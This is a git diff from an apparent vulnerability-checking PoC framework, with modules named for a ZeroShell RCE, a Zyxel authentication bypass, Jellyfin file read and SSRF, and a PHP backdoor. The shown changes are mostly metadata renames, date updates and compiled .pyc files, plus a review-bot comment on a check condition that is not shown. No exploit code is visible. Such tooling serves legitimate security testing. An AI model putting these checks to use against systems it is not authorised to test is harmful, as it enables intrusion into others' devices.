漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "禅道", # 漏洞应用名称 "AppVersion" : "禅道8.9-9.2.1", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx 
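Review bot: The new success condition at the end of this hunk can never hold, because `"" not in req.text` is always False (the empty string is a substring of every string), so `vuln` is always set to `[False,req.text]` and the check silently reports nothing on every target. Remove that clause or substitute the marker it was meant to test, and fold the backslash-continued chain into one parenthesised expression: `if req.status_code == 200 and "chkbxRange.init();" in req.text and "incorrect" not in req.text:`. `url = self.target + ""` is also still the template's empty suffix, so the form is posted to the bare target; confirm that is the intended endpoint. `_verify` starts in the previous hunk and its `except`/`return` path lies outside this one.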
diff --git a/poc/ZeroShell/RCE_kerbynet/__pycache__/poc.cpython-38.pyc b/poc/ZeroShell/RCE_kerbynet/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..3930956 Binary files /dev/null and b/poc/ZeroShell/RCE_kerbynet/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Zyxel/Login_Pass_NBG2105/__pycache__/poc.cpython-38.pyc b/poc/Zyxel/Login_Pass_NBG2105/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..3686471 Binary files /dev/null and b/poc/Zyxel/Login_Pass_NBG2105/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Zyxel/Login_Pass_NBG2105/poc.py b/poc/Zyxel/Login_Pass_NBG2105/poc.py index bee4057..9363217 100644 --- a/poc/Zyxel/Login_Pass_NBG2105/poc.py +++ b/poc/Zyxel/Login_Pass_NBG2105/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "Zyxel NBG2105身份验证绕过", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "Zyxel NBG2105", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/common/Apache_Dir_List/__pycache__/poc.cpython-38.pyc b/poc/common/Apache_Dir_List/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..2d3eb54 Binary files /dev/null and b/poc/common/Apache_Dir_List/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/common/Apache_Dir_List/poc.py b/poc/common/Apache_Dir_List/poc.py index 089c3ad..06bbd22 100644 --- a/poc/common/Apache_Dir_List/poc.py +++ b/poc/common/Apache_Dir_List/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "Apache列目录", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx 
diff --git a/poc/common/Git_Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/common/Git_Info_Disclosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..1ad28e8
Binary files /dev/null and b/poc/common/Git_Info_Disclosure/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/common/Git_Info_Disclosure/poc.pyc b/poc/common/Git_Info_Disclosure/poc.pyc
index 7e9f52e..0c45933 100644
Binary files a/poc/common/Git_Info_Disclosure/poc.pyc and b/poc/common/Git_Info_Disclosure/poc.pyc differ
diff --git a/poc/common/Svn_Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/common/Svn_Info_Disclosure/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..78c4180
Binary files /dev/null and b/poc/common/Svn_Info_Disclosure/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/common/Svn_Info_Disclosure/poc.pyc b/poc/common/Svn_Info_Disclosure/poc.pyc
index 087cc58..04401dd 100644
Binary files a/poc/common/Svn_Info_Disclosure/poc.pyc and b/poc/common/Svn_Info_Disclosure/poc.pyc differ
diff --git a/poc/common/Url_Alive/__pycache__/poc.cpython-38.pyc b/poc/common/Url_Alive/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..249449d
Binary files /dev/null and b/poc/common/Url_Alive/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/common/Url_Alive/poc.pyc b/poc/common/Url_Alive/poc.pyc
index dc6f7d4..53d68f5 100644
Binary files a/poc/common/Url_Alive/poc.pyc and b/poc/common/Url_Alive/poc.pyc differ
diff --git a/poc/demo/demo/poc.py b/poc/demo/demo/poc.py
index 5b8220d..eb5d68a 100644
--- a/poc/demo/demo/poc.py
+++ b/poc/demo/demo/poc.py
@@ -11,17 +11,17 @@ class POC(POCBase): _info = { "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 - "CreateDate" : "2021-06-09", # POC创建时间 - "UpdateDate" : "2021-06-09", # POC创建时间 + "CreateDate" : "2022-01-01", # POC创建时间 + "UpdateDate" : "2022-01-01", # POC创建时间 "PocDesc" : """ 略 """, # POC描述,写更新描述,没有就不写 "name" : "Demo", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 - "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx "VulnDesc" : """ """, # 漏洞简要描述 @@ -45,7 +45,8 @@ class POC(POCBase): url = self.target + "" # url自己按需调整 - headers = {"User-Agent":get_random_ua(), + headers = { + "User-Agent":get_random_ua(), "Connection":"close", # "Content-Type": "application/x-www-form-urlencoded", } diff --git a/poc/jellyfin/File_Read_CVE_2021_21402/__pycache__/poc.cpython-38.pyc b/poc/jellyfin/File_Read_CVE_2021_21402/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4bd21ad Binary files /dev/null and b/poc/jellyfin/File_Read_CVE_2021_21402/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc b/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc index 7f5cb0f..fd50364 100644 Binary files a/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc and b/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc differ diff --git a/poc/jellyfin/SSRF_CVE_2021_29490/__pycache__/poc.cpython-38.pyc b/poc/jellyfin/SSRF_CVE_2021_29490/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1eb4b26 Binary files /dev/null and b/poc/jellyfin/SSRF_CVE_2021_29490/__pycache__/poc.cpython-38.pyc differ 
diff --git a/poc/php/Backdoor_v8dev/__pycache__/poc.cpython-38.pyc b/poc/php/Backdoor_v8dev/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..8db43bb
Binary files /dev/null and b/poc/php/Backdoor_v8dev/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/php/Backdoor_v8dev/poc.pyc b/poc/php/Backdoor_v8dev/poc.pyc
index f315c1f..22d0293 100644
Binary files a/poc/php/Backdoor_v8dev/poc.pyc and b/poc/php/Backdoor_v8dev/poc.pyc differ
diff --git a/poc/一指通/XiaMen_Yizhitong_Weak_pass/__pycache__/poc.cpython-38.pyc b/poc/一指通/XiaMen_Yizhitong_Weak_pass/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..bbea6a1
Binary files /dev/null and b/poc/一指通/XiaMen_Yizhitong_Weak_pass/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/中硅技术/ZhongGuijishu_Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/中硅技术/ZhongGuijishu_Unauth_Access/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..38d614b
Binary files /dev/null and b/poc/中硅技术/ZhongGuijishu_Unauth_Access/__pycache__/poc.cpython-38.pyc differ